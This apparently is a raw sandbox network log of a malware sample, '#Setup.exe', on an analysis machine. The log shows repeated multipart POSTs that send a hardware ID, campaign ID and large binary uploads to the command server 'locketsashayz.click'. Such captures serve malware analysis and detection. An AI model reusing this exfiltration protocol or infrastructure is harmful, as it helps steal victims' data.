{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=alahjz3oCjB5uu9%2BjI1DRFGhJvIeYHeB2ONRl3ZVsHgElJLumb7RpCTFzXD3rBd07rO19pAgD8frzKn7SRsxdgh71BfVoaaeIgwhNRH52aBgjU9IgyJ6TCwiTLAuoaRqzHOPms81"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa3abb80d5c7d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1973&rtt_var=771&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13780&delivery_rate=1392465&cwnd=243&unsent_bytes=0&cid=cfcf941404167688&ts=600&x=0"
2024-12-30 17:15:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 17:15:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49729	188.114.97.3	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:15 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=M1WIYCAIUR6I14 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15080 Host: locketsashayz.click
2024-12-30 17:15:15 UTC	15080	OUT	Data Raw: 2d 2d 4d 31 57 49 59 43 41 49 55 52 36 49 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 44 41 34 32 42 31 32 35 41 39 32 45 31 39 31 44 44 43 42 37 41 42 36 43 39 43 34 34 42 30 0d 0a 2d 2d 4d 31 57 49 59 43 41 49 55 52 36 49 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 31 57 49 59 43 41 49 55 52 36 49 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4d 31 57 49 59 43 41 49 55 Data Ascii: --M1WIYCAIUR6I14Content-Disposition: form-data; name="hwid"4EDA42B125A92E191DDCB7AB6C9C44B0--M1WIYCAIUR6I14Content-Disposition: form-data; name="pid"2--M1WIYCAIUR6I14Content-Disposition: form-data; name="lid"hRjzG3--TRON--M1WIYCAIU
2024-12-30 17:15:16 UTC	1127	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:15:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0aqmje6mq4o3l413jlge5aemc2; expires=Fri, 25 Apr 2025 11:01:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7sqX6lY2YCrnyzZuWakHpla87H25vf%2FqrqpSLhUcaUuKWjTfj1dEUSXJatCFpDourWHezj8g%2BYSHcyIf1FgSvHapVvwgnUH2P2MhrgDd2Mqp2TJi8fYMzZdtEPTF3kGry30OA1o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa3abbfda21435d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3418&min_rtt=1605&rtt_var=1846&sent=7&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16019&delivery_rate=1819314&cwnd=128&unsent_bytes=0&cid=3b168b8b44750a0a&ts=503&x=0"
2024-12-30 17:15:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 17:15:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49741	188.114.97.3	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:17 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JHXTJB6YR5T17 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19932 Host: locketsashayz.click
2024-12-30 17:15:17 UTC	15331	OUT	Data Raw: 2d 2d 4a 48 58 54 4a 42 36 59 52 35 54 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 44 41 34 32 42 31 32 35 41 39 32 45 31 39 31 44 44 43 42 37 41 42 36 43 39 43 34 34 42 30 0d 0a 2d 2d 4a 48 58 54 4a 42 36 59 52 35 54 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 48 58 54 4a 42 36 59 52 35 54 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4a 48 58 54 4a 42 36 59 52 35 54 31 Data Ascii: --JHXTJB6YR5T17Content-Disposition: form-data; name="hwid"4EDA42B125A92E191DDCB7AB6C9C44B0--JHXTJB6YR5T17Content-Disposition: form-data; name="pid"3--JHXTJB6YR5T17Content-Disposition: form-data; name="lid"hRjzG3--TRON--JHXTJB6YR5T1
2024-12-30 17:15:17 UTC	4601	OUT	Data Raw: 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2024-12-30 17:15:18 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:15:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=11r818lkaj9ae621irhnfeqfl3; expires=Fri, 25 Apr 2025 11:01:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HclRmA938YuR%2FwBocYIe0YuZU5zien0Anj%2BAUeo3J1pJjOLMKGYd4YB07NPf5wyzKFChXrhKmpdoFuWPhQqR2kQ4HfyQSI0UQue%2BypwTkSChrAun%2F91qpImN5jgEyobJmgaP8jZF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa3abcb1a5d7d1c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6052&min_rtt=6052&rtt_var=3026&sent=12&recv=25&lost=0&retrans=1&sent_bytes=4230&recv_bytes=20892&delivery_rate=113433&cwnd=157&unsent_bytes=0&cid=59252b9c2e937de9&ts=687&x=0"
2024-12-30 17:15:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 17:15:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49752	188.114.97.3	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:19 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=077G7BBQYB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5427 Host: locketsashayz.click
2024-12-30 17:15:19 UTC	5427	OUT	Data Raw: 2d 2d 30 37 37 47 37 42 42 51 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 44 41 34 32 42 31 32 35 41 39 32 45 31 39 31 44 44 43 42 37 41 42 36 43 39 43 34 34 42 30 0d 0a 2d 2d 30 37 37 47 37 42 42 51 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 37 37 47 37 42 42 51 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 30 37 37 47 37 42 42 51 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --077G7BBQYBContent-Disposition: form-data; name="hwid"4EDA42B125A92E191DDCB7AB6C9C44B0--077G7BBQYBContent-Disposition: form-data; name="pid"1--077G7BBQYBContent-Disposition: form-data; name="lid"hRjzG3--TRON--077G7BBQYBContent-D
2024-12-30 17:15:20 UTC	1127	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:15:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7937nfr62p1r73o2d3nhp5gkhb; expires=Fri, 25 Apr 2025 11:01:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gDkKk27rM0eVv4AKjKTwryw4LJAY%2BqyxU6nJDfT0ay53HAX4sO%2BIXLw7wGzNvEOw7SMT3wQxE86LuiKxMHivbYg5iuaeEHDKsRhMbBjYvGS5w6NxXA58KxmshF0Y3zcC4%2B1Wh3on"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa3abd4ee7641e0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1829&rtt_var=687&sent=5&recv=11&lost=0&retrans=0&sent_bytes=2847&recv_bytes=6339&delivery_rate=1593016&cwnd=238&unsent_bytes=0&cid=09bfabceabefb84a&ts=957&x=0"
2024-12-30 17:15:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 17:15:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49760	188.114.97.3	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:20 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YALTMAV0YT1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1192 Host: locketsashayz.click
2024-12-30 17:15:20 UTC	1192	OUT	Data Raw: 2d 2d 59 41 4c 54 4d 41 56 30 59 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 44 41 34 32 42 31 32 35 41 39 32 45 31 39 31 44 44 43 42 37 41 42 36 43 39 43 34 34 42 30 0d 0a 2d 2d 59 41 4c 54 4d 41 56 30 59 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 41 4c 54 4d 41 56 30 59 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 59 41 4c 54 4d 41 56 30 59 54 31 0d 0a 43 6f 6e 74 65 Data Ascii: --YALTMAV0YT1Content-Disposition: form-data; name="hwid"4EDA42B125A92E191DDCB7AB6C9C44B0--YALTMAV0YT1Content-Disposition: form-data; name="pid"1--YALTMAV0YT1Content-Disposition: form-data; name="lid"hRjzG3--TRON--YALTMAV0YT1Conte
2024-12-30 17:15:21 UTC	1130	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 17:15:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fnb7snbch47jqgb0clo60h30f3; expires=Fri, 25 Apr 2025 11:02:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNEN8z3K%2FL1MAmMBilSL2lQgfsaxljZWmGJk2%2BkEDa6cucQIrqB6nCzL2gU3vnuNDZ24Ierr3tNEXD%2Fd7c6jfMvk%2FhuBeBllKrg9pzYoNRjYtswFoZ%2BNRF65DaIRGnZ2Q6apHEuk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa3abdf2b387c87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1859&min_rtt=1858&rtt_var=700&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2105&delivery_rate=1560662&cwnd=209&unsent_bytes=0&cid=5d475517487f2128&ts=573&x=0"
2024-12-30 17:15:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 17:15:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49777	188.114.97.3	443	2064	C:\Users\user\Desktop\#Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 17:15:22 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2A9SX09VK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 576103 Host: locketsashayz.click
2024-12-30 17:15:22 UTC	15331	OUT	Data Raw: 2d 2d 32 41 39 53 58 30 39 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 44 41 34 32 42 31 32 35 41 39 32 45 31 39 31 44 44 43 42 37 41 42 36 43 39 43 34 34 42 30 0d 0a 2d 2d 32 41 39 53 58 30 39 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 41 39 53 58 30 39 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 32 41 39 53 58 30 39 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --2A9SX09VKContent-Disposition: form-data; name="hwid"4EDA42B125A92E191DDCB7AB6C9C44B0--2A9SX09VKContent-Disposition: form-data; name="pid"1--2A9SX09VKContent-Disposition: form-data; name="lid"hRjzG3--TRON--2A9SX09VKContent-Dispo
2024-12-30 17:15:22 UTC	15331	OUT	Data Raw: b8 ba e4 62 46 e5 67 e9 a2 11 3e a3 87 e1 87 7a b1 b1 e2 0f 8a b8 c5 78 30 8e 6a 9f e2 fd 32 54 a5 1b 24 70 ee 48 11 af 42 44 56 bc fe 0d 13 42 ff fe 68 d8 4f 62 56 88 ce 40 b5 4f ae 8b f5 15 0d 47 32 44 88 6a ba 53 06 00 63 7b a2 02 77 9a 44 c9 98 37 32 8c 89 b0 27 3c 4f b6 56 a5 f7 2d 99 c3 31 83 30 5b 48 70 4b 02 d3 87 86 e3 b9 b7 22 35 3e 5e 1f b7 8d 53 1f 57 7a f9 c5 81 f9 cc c1 9a 65 4f 97 8e db be e5 f7 78 0e 0e 4a 3b 71 e3 45 ad 1f f8 ae 55 68 6e 2c fd 71 97 db 91 00 65 a2 22 59 61 24 58 60 9a 92 af e9 da 40 ea c0 5e 64 64 f7 fb 49 ee 34 4a 9b df b0 e0 1e 1a 8b de ae 0f db 67 69 88 85 67 f1 25 94 e4 15 f6 95 62 48 52 e9 eb ab 96 17 cd d4 0a be 58 f7 f4 7b 72 7f 4c ce d7 fd 5a 7f 2a 3d 1c 11 9a 88 dd 55 5a 12 49 12 fd 8a d0 04 03 e6 c7 0a b3 68 b5 Data Ascii: bFg>zx0j2T$pHBDVBhObV@OG2DjSc{wD72'<OV-10[HpK"5>^SWzeOxJ;qEUhn,qe"Ya$X`@^ddI4Jgig%bHRX{rLZ*=UZIh
2024-12-30 17:15:22 UTC	15331	OUT	Data Raw: e7 a3 8f e1 15 a2 b7 e9 3f 7c 45 a3 5e 94 f2 de ff 88 24 74 75 b0 5f 38 10 3c 7a 3b 0d e7 0f 64 ae 2d bc 19 ae ee fd a0 4a 6a 38 b2 fb 0e bb b3 ac 76 3c b1 da ab a8 6a 7e 3d 64 d8 ab 6c 64 32 9c bb 92 59 55 b5 b0 f9 21 c4 6f f6 68 19 f9 cb df af 21 c6 bb 00 ee 27 27 ad 9f 66 01 ff fd c8 2c 5f e9 d0 57 87 eb 0a b8 8b e7 59 83 99 81 3b 43 5f c4 9c 37 0e 29 c8 49 2d 6d fe b8 bd 46 1f fd 57 4d d8 c4 f9 eb eb 8d 0c d1 b1 e5 fb 0e d5 f3 df c2 59 63 4f 05 6b 3a 7e af 99 fc 49 e1 5b 0d a7 a3 8a 59 a4 3d 37 92 f6 d0 bb fc 55 6e 5f 1f 16 b6 32 e6 94 38 54 dd 7d 37 54 72 f3 9f 21 f6 7a 55 3d 7f 0e 4b 39 6c 34 f2 ab 87 81 45 79 47 e4 83 fd de 41 41 b0 5f e3 e4 b3 1d 46 de 9f f6 61 60 6e d5 3e c6 99 fc 38 8f 7d 0c f2 99 e3 20 d4 eb 57 61 7d dd 3b c1 a9 0f 18 20 f9 55 Data Ascii: ?\|E^$tu_8<z;d-Jj8v<j~=dld2YU!oh!''f,_WY;C_7)I-mFWMYcOk:~I[Y=7Un_28T}7Tr!zU=K9l4EyGAA_Fa`n>8} Wa}; U
2024-12-30 17:15:22 UTC	15331	OUT	Data Raw: 4f 2c 76 3b c0 87 ff d2 e6 9f f4 55 af 6f 7c c9 8d 63 0a 58 17 22 59 15 73 af 1c 93 c5 c4 fb 22 36 49 ba 69 29 d5 95 32 9e 0d bd 01 45 cd d0 bf cc 89 3f 5b 60 a9 cf f2 29 8c 36 e3 67 13 0e 03 cc ba 3f a3 e9 9e 5b a7 0f 37 f2 ce 7f 45 45 5a 3f df 21 f9 62 06 00 cf 4e c5 19 cc 57 4e d6 3d ff cd 65 fd 37 91 d3 a7 7d 4b 29 59 1b dd b4 cb 7a e3 3d 2d a3 2f 24 7d cf 85 c1 9f 57 e3 d9 30 c4 2d 19 c5 79 ac ba 1d d3 81 77 71 c1 93 af 2e 98 19 ac c8 da 8e da 51 1d 1c 2d 71 36 2a 20 99 bb ec 69 ba 76 ef 0b f5 27 6b 20 cf 94 3e f7 a8 78 e7 ee fe af 43 f6 db 01 fa 3b 85 25 60 38 f1 33 92 44 53 a0 19 f1 03 5d 7e 28 9a 17 4c 94 67 6b a0 bb 79 98 b3 08 a0 84 a4 e0 af 49 1d 4f e6 af ca 94 00 9a 70 04 04 7a 84 ce 15 f3 40 39 fc ed 68 84 10 10 10 86 fd 6f 67 71 91 5a 81 1d Data Ascii: O,v;Uo\|cX"Ys"6Ii)2E?[`)6g?[7EEZ?!bNWN=e7}K)Yz=-/$}W0-ywq.Q-q6* iv'k >xC;%`83DS]~(LgkyIOpz@9hogqZ
2024-12-30 17:15:22 UTC	15331	OUT	Data Raw: 3b c3 6b 37 cd 76 4b 0c ff ba 94 a4 8e e9 d3 10 07 2e 4f a5 4e 5f 05 53 ac 1d 9e fa 07 da ba 89 2d e6 57 a8 ea 17 6a 0c aa 8d 5a 19 2b 11 ad ff db ba 8e e0 ba 6b 99 71 2a 3c 42 a5 ea 74 26 06 64 95 23 de fc 3f a1 fa ff e4 6c 03 38 cd cc 96 22 02 e6 30 e0 1a 7a 6a c4 5e 12 6a 7a b9 dd f5 8b 13 b0 80 03 72 0c 09 d9 0d 3b 96 08 10 ba 9d af 0a 05 29 c1 e9 c2 2b 06 80 8c 08 13 05 07 ba ee 00 d3 ee fa 60 0c 5b 0d d5 72 ca df a8 70 a8 65 0e ff cf 24 aa 17 7d 74 a8 55 bc 00 19 f3 4a 82 fc c1 0c c2 c9 67 d4 85 18 7d 97 0b 7a 3d 9b ef 2e 8a 23 ca 90 d3 b4 d8 56 5c af a3 70 f2 a0 61 4a 75 ac d2 0d d1 29 94 80 05 91 8a d8 3c bc d4 4e 47 10 d9 17 7d ac 37 67 3f 6e 86 eb 72 77 d6 2a a8 b0 29 20 56 72 12 37 f7 fa 21 9b ad 11 47 87 6f f1 17 05 8d a3 0b df 79 25 14 3a c4 Data Ascii: ;k7vK.ON_S-WjZ+kq<Bt&d#?l8"0zj^jzr;)+`[rpe$}tUJg}z=.#V\paJu)<NG}7g?nrw) Vr7!Goy%:
2024-12-30 17:15:22 UTC	15331	OUT	Data Raw: d9 48 85 18 6c ee 32 77 0d 0e 3e a1 65 09 69 5a 92 20 28 7f 2e f7 bf 75 76 fd 76 cd bc c2 65 70 c7 ef 19 9f ef c8 38 cc 1f e9 7f 67 26 0a 00 c0 11 06 1a 89 50 28 60 ae 4f 4d 3d 18 49 3b 0f e7 87 d7 61 4f 28 37 3a 6f f7 40 5c f5 fe c3 06 60 0d 9b a7 c0 ab 3f 46 6e 0e 51 04 c0 ab a5 36 24 5d 81 45 4f 09 fd 55 7a c0 00 3b 15 a0 81 84 78 11 87 10 26 54 fa 3d 26 f7 34 21 26 b2 da f7 4b ab c0 0b 7d 6f c9 9b 2d 23 7f df b0 63 55 75 1c 72 14 16 ae 7f ae 77 ab f4 fa 1b 88 3c be 71 79 8f 0c d0 be 39 34 f1 0f 66 e3 2b c4 28 ab 3e 86 63 08 8e e9 60 84 a0 85 46 a1 5e c9 9f b2 f4 c6 3d 97 ce e4 62 7d 0b 0b 6a 08 fc 73 70 7c 62 99 8e 68 78 7d 1b 6c 97 8d ca 43 64 f5 c5 83 d8 ce bf 92 93 bf 82 ec 40 f0 c6 94 54 34 f0 8a 71 16 90 f3 f0 57 52 05 e8 ed a1 9f f5 c1 bb 46 e3 Data Ascii: Hl2w>eiZ (.uvvep8g&P(`OM=I;aO(7:o@\`?FnQ6$]EOUz;x&T=&4!&K}o-#cUurw<qy94f+(>c`F^=b}jsp\|bhx}lCd@T4qWRF
2024-12-30 17:15:22 UTC	15331	OUT	Data Raw: 81 41 7c 6a dd 71 9f b5 7d 2d 66 2a 92 9b 80 5a 91 fb 52 b6 9b 0d 07 41 9d 5a 4c a9 7e 01 ef 49 ae df 9e 62 6c 48 eb fc 17 ba 20 23 a9 98 8b 45 29 da f1 20 0e 4a d6 d7 3e 84 c8 ec 02 b6 4b ea 96 07 c4 30 30 fe 6c b8 bd 29 a1 d2 ea b9 38 fc 59 20 8d f5 db 95 f5 fb 9f ba 9a 67 11 dc cd 9c ed 49 8e d2 1b d7 1a 45 8e 59 30 4b 61 e1 c8 c6 1e 6b b6 79 fc 62 38 ab 2d 71 47 3d 86 a2 3e c4 a0 32 08 e3 8d 7f bf 7d f1 eb 85 0d dd ee 15 ac fb cc 6b dc 65 64 ff 29 75 a3 d5 19 fa 32 eb 9f dd 52 03 54 55 86 0e 76 aa 87 07 d4 2c 7f ff e9 79 f3 52 88 a5 15 a1 28 6e b3 02 13 35 ff 46 f5 f4 fd 13 77 e6 9d fa 3c fd 72 7b 9e b6 08 04 d0 7d 6f 2a 05 e2 b5 c5 65 d7 94 f6 a2 f0 d1 ab 85 8f 2a 50 d9 57 82 18 a3 c7 d4 c2 7a bf 0b 7a ab fd 31 c9 a3 76 da bd ee a0 88 9f 16 f2 1c e1 Data Ascii: A\|jq}-fZRAZL~IblH #E) J>K00l)8Y gIEY0Kakyb8-qG=>2}ked)u2RTUv,yR(n5Fw<r{}oe*PWzz1v
2024-12-30 17:15:22 UTC	15331	OUT	Data Raw: d3 f8 5c 9d b6 32 77 68 72 4e 87 b9 7b f8 db ea 51 7e ce 90 c9 cc b1 fa 9b ec 6a 52 b0 e0 bb ed 20 5d 42 1d 3a d6 04 c0 51 1d 30 dd b9 b3 22 0e 22 39 c7 bc f6 60 f5 bc 99 04 68 19 51 a1 d5 dc bf 4f 7b 20 6a 1a fe 9d bb 4f 25 b5 40 c2 75 eb 8b 47 ae 35 c8 78 99 de df 22 d1 22 56 df cc 14 17 a7 88 ac 1c cf 2e ec ab 6c 78 5e 58 fc d3 1a c1 94 46 65 7c 6e 60 fd 27 04 0f 47 c3 27 44 81 1d fb 03 24 78 52 51 a5 07 90 a0 53 0a 34 9b f6 da 6d 4e 92 8c 84 a8 e4 16 0b c0 7c 75 7f 30 e8 6b 5d 25 4c 91 4e 08 40 c0 89 9c 17 4f 6a 7c b8 57 31 7c 1f 69 a7 31 64 d0 ed 8d b3 20 5d 13 77 19 03 09 03 19 9e 06 d0 d2 5f 7f 88 65 